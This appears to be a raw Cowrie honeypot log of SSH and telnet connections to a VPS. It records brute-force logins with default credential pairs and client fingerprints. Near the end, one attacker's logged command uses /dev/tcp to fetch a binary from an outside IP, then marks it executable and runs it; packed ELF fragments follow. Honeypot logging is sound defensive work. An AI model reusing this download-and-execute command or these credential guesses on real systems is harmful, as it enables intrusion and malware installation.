.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T18:57:55.605706Z","src_ip":"212.227.235.229","session":"8149846e5e51"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:57:56.020412Z","src_ip":"212.227.235.229","session":"8149846e5e51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T18:57:56.159004Z","session":"8149846e5e51"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":37282,"dst_ip":"1.2.3.4","dst_port":22,"session":"56a5acd33325","protocol":"ssh","message":"New connection: 170.64.157.139:37282 (1.2.3.4:22) [session: 56a5acd33325]","sensor":"my-vps","timestamp":"2025-09-08T18:59:04.153283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:59:04.154042Z","src_ip":"170.64.157.139","session":"56a5acd33325"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:59:04.499741Z","src_ip":"170.64.157.139","session":"56a5acd33325"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test123","message":"login attempt [oracle/test123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:59:05.381108Z","src_ip":"170.64.157.139","session":"56a5acd33325"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:59:05.468377Z","src_ip":"212.227.235.229","session":"8149846e5e51"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:59:06.673565Z","src_ip":"170.64.157.139","session":"56a5acd33325"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":50096,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6f97c93f6cc","protocol":"ssh","message":"New connection: 170.64.157.139:50096 (1.2.3.4:22) [session: b6f97c93f6cc]","sensor":"my-vps","timestamp":"2025-09-08T19:00:17.360280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:00:17.360959Z","src_ip":"170.64.157.139","session":"b6f97c93f6cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:00:17.659565Z","src_ip":"170.64.157.139","session":"b6f97c93f6cc"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test321","message":"login attempt [oracle/test321] failed","sensor":"my-vps","timestamp":"2025-09-08T19:00:18.600880Z","src_ip":"170.64.157.139","session":"b6f97c93f6cc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:00:19.901160Z","src_ip":"170.64.157.139","session":"b6f97c93f6cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49244,"dst_ip":"1.2.3.4","dst_port":22,"session":"f98844687234","protocol":"ssh","message":"New connection: 212.227.235.229:49244 (1.2.3.4:22) [session: f98844687234]","sensor":"my-vps","timestamp":"2025-09-08T19:01:42.841201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:01:42.846558Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T19:01:42.972710Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","sensor":"my-vps","timestamp":"2025-09-08T19:01:43.285470Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:01:43.286104Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","sensor":"my-vps","timestamp":"2025-09-08T19:01:43.390222Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:01:43.391142Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:01:52.847135Z","src_ip":"212.227.235.229","session":"f98844687234"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50914,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fdbb6d34a7c","protocol":"ssh","message":"New connection: 212.227.235.229:50914 (1.2.3.4:22) [session: 5fdbb6d34a7c]","sensor":"my-vps","timestamp":"2025-09-08T19:01:52.904024Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:01:53.179012Z","src_ip":"212.227.235.229","session":"5fdbb6d34a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55754,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eee64c3d256","protocol":"ssh","message":"New connection: 212.227.125.160:55754 (1.2.3.4:22) [session: 5eee64c3d256]","sensor":"my-vps","timestamp":"2025-09-08T19:01:54.329511Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:01:54.640060Z","src_ip":"212.227.125.160","session":"5eee64c3d256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35639,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7cd5d241bc5","protocol":"ssh","message":"New connection: 212.227.125.160:35639 (1.2.3.4:22) [session: e7cd5d241bc5]","sensor":"my-vps","timestamp":"2025-09-08T19:02:37.133700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:02:37.135996Z","src_ip":"212.227.125.160","session":"e7cd5d241bc5"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-09-08T19:02:37.307668Z","src_ip":"212.227.125.160","session":"e7cd5d241bc5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:02:41.136368Z","src_ip":"212.227.125.160","session":"e7cd5d241bc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48940,"dst_ip":"1.2.3.4","dst_port":23,"session":"15c5ec506254","protocol":"telnet","message":"New connection: 212.227.125.160:48940 (1.2.3.4:23) [session: 15c5ec506254]","sensor":"my-vps","timestamp":"2025-09-08T19:03:20.296899Z"}
{"eventid":"cowrie.session.closed","duration":13.027018547058105,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:03:33.323845Z","src_ip":"212.227.125.160","session":"15c5ec506254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37106,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c79cc881980","protocol":"telnet","message":"New connection: 212.227.125.160:37106 (1.2.3.4:23) [session: 8c79cc881980]","sensor":"my-vps","timestamp":"2025-09-08T19:03:34.001724Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:03:34.089352Z","src_ip":"212.227.125.160","session":"8c79cc881980"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:03:34.168341Z","src_ip":"212.227.125.160","session":"8c79cc881980"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57580,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40ecbd6a371","protocol":"ssh","message":"New connection: 217.72.205.35:57580 (1.2.3.4:22) [session: c40ecbd6a371]","sensor":"my-vps","timestamp":"2025-09-08T19:03:38.129543Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:03:38.130791Z","src_ip":"217.72.205.35","session":"c40ecbd6a371"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":39264,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b5234323a9c","protocol":"ssh","message":"New connection: 8.138.136.155:39264 (1.2.3.4:22) [session: 8b5234323a9c]","sensor":"my-vps","timestamp":"2025-09-08T19:03:51.730456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T19:03:51.731333Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T19:03:51.731897Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T19:03:52.425664Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:03:53.645198Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:03:54.096601Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T19:03:54.098509Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/RgyCyhx0mg && chmod +x /tmp/RgyCyhx0mg && /tmp/RgyCyhx0mg dj7l8XYRhPRg005/aUzcZOqCFHz/7CgPGS/s5moRhOl80kZrZ07XZuiTEXbm8y8DAzDs53QOgexo0E5gYUnGavSCE3zx7C0BGS/o6n4Wg+tj17Fz5wMEcgZVHujdsuOjDkyPtVJA3DpthoOb\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/RgyCyhx0mg && chmod +x /tmp/RgyCyhx0mg && /tmp/RgyCyhx0mg dj7l8XYRhPRg005/aUzcZOqCFHz/7CgPGS/s5moRhOl80kZrZ07XZuiTEXbm8y8DAzDs53QOgexo0E5gYUnGavSCE3zx7C0BGS/o6n4Wg+tj17Fz5wMEcgZVHujdsuOjDkyPtVJA3DpthoOb\" &","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.328745Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/imBM7apSrJ","message":"CMD: head -c 1458464 > /tmp/imBM7apSrJ","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.332370Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.563220Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.568159Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.571829Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
